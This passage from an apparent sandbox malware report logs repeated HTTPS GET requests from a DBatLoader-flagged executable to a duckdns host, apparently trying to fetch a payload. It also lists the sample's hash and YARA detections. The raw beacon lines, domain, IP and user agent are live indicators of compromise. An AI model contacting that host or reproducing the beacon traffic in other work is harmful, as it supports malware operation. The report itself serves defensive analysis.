                2022-08-05 10:11:48 UTC34INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                83192.168.2.649877208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:49 UTC35OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:49 UTC35INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:49 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:49 UTC35INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                84192.168.2.649878208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:49 UTC35OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:49 UTC35INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:49 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:49 UTC35INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                85192.168.2.649880208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:51 UTC35OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:51 UTC36INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:51 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:51 UTC36INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                86192.168.2.649881208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:52 UTC36OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:52 UTC36INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:52 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:52 UTC36INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                87192.168.2.649882208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:54 UTC36OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:54 UTC36INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:54 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:54 UTC37INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                88192.168.2.649883208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:55 UTC37OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:55 UTC37INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:55 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:55 UTC37INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                89192.168.2.649884208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:59 UTC37OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:59 UTC37INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:59 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:59 UTC37INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                9192.168.2.649767208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:34 UTC3OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:35 UTC3INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:34 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:35 UTC4INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                90192.168.2.649885208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:00 UTC38OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:00 UTC38INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:00 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:00 UTC38INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                91192.168.2.649886208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:00 UTC38OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:00 UTC38INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:00 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:00 UTC38INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                92192.168.2.649887208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:01 UTC38OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:01 UTC39INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:01 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:01 UTC39INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                93192.168.2.649888208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:02 UTC39OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:02 UTC39INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:02 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:02 UTC39INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                94192.168.2.649889208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:02 UTC39OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:02 UTC39INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:02 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:02 UTC40INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                95192.168.2.649890208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:03 UTC40OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:03 UTC40INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:03 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:03 UTC40INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                96192.168.2.649892208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:04 UTC40OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:04 UTC40INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:04 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:04 UTC40INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                97192.168.2.649893208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:05 UTC41OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:05 UTC41INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:05 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:05 UTC41INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                98192.168.2.649894208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:05 UTC41OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:05 UTC41INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:05 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:05 UTC41INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                99192.168.2.649895208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:05 UTC41OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:05 UTC42INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:05 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:05 UTC42INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Statistics

                No statistics

                System Behavior

                General

                Target ID:0
                Start time:12:10:24
                Start date:05/08/2022
                Path:C:\Users\user\Desktop\vOj00hEkoQ.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\vOj00hEkoQ.exe"
                Imagebase:0x400000
                File size:1009664 bytes
                MD5 hash:17E836D33B139295B876B1A3B6A23299
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Borland Delphi
                Yara matches:
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.392588116.0000000004686000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.446198402.0000000005459000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.373361346.0000000005270000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.490854963.0000000005867000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.467333094.0000000005480000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.458083719.0000000005496000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.375096550.0000000005370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.456022736.000000000534F000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
